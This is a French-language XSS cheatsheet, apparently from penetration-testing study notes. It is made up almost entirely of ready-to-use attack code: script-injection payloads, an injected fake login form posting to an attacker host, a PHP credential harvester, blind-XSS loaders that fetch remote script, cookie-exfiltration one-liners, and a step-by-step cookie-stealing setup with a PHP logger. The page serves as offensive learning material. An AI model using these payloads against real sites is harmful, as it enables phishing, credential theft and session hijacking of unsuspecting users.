XSS

Cross-Site Scripting (XSS) Cheatsheet

Payloads de Base

<script>alert(window.origin)</script>
<iframe src=file:///flag.txt></iframe>

Outils : XssStrike

python xsstrike.py -u 'http://83.136.255.40:49597/?fullname=nhj&username=jhk&password=jl&email=lkl@gmail.com'

Formulaire de Connexion Malveillant

<h3>Please login to continue</h3>
<form action=http://OUR_IP>
    <input type="username" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" name="submit" value="Login">
</form>

Exemple en JavaScript

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

Serveur de Récupération des Identifiants (PHP)

<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://SERVER_IP/phishing/index.php");
    fclose($file);
    exit();
}
?>

XSS Aveugle (Blind XSS)

<script src=http://OUR_IP></script>
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>
<script>$.getScript("http://OUR_IP")</script>
<script>fetch('http://OUR_IP/exfil?cookie=' + btoa(document.cookie))</script>

Exfiltration de Cookies

document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;

Explication du Vol de Cookies

Trouver un payload fonctionnel.
Créer un fichier JavaScript :

cat cookie.js
new Image().src='http://10.10.14.119:8000/cookie.php?c='+document.cookie;

Lancer un serveur Python dans le même dossier.
Créer un fichier PHP pour stocker les cookies :

cat cookie.php
<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

Lancer un serveur PHP php -S 0.0.0.0:8000
Injecter le script :

"><script src='http://10.10.14.119/cookie.js'></script>

Exploitation XSS via PDF

Exemple de code injecté dans un PDF

trailer
<</Size 4/Root 1 0 R>>
startxref
190
3 0 obj
<< /Type /Page
   /Contents 4 0 R
   /AA <<
     /O <<
        /F (\\\\10.10.14.8\\test)
      /D [ 0 /Fit]
      /S /GoToE
      >>
     >>
     /Parent 2 0 R
     /Resources <<
      /Font <<
        /F1 <<
          /Type /Font
          /Subtype /Type1
          /BaseFont /Helvetica

Exfiltration sans IP Publique

Utiliser www.postb.in pour recevoir les données sans IP publique.

PrécédentSSTI SuivantXXE

Mis à jour il y a 1 an

hashtagCross-Site Scripting (XSS) Cheatsheet

hashtagPayloads de Base

hashtagOutils : XssStrike

hashtagFormulaire de Connexion Malveillant

hashtagExemple en JavaScript

hashtagServeur de Récupération des Identifiants (PHP)

hashtagXSS Aveugle (Blind XSS)

hashtagExfiltration de Cookies

hashtagExplication du Vol de Cookies

hashtagExploitation XSS via PDF

hashtagExemple de code injecté dans un PDF

hashtagExfiltration sans IP Publique

Cross-Site Scripting (XSS) Cheatsheet

Payloads de Base

Outils : XssStrike

Formulaire de Connexion Malveillant

Exemple en JavaScript

Serveur de Récupération des Identifiants (PHP)

XSS Aveugle (Blind XSS)

Exfiltration de Cookies

Explication du Vol de Cookies

Exploitation XSS via PDF

Exemple de code injecté dans un PDF

Exfiltration sans IP Publique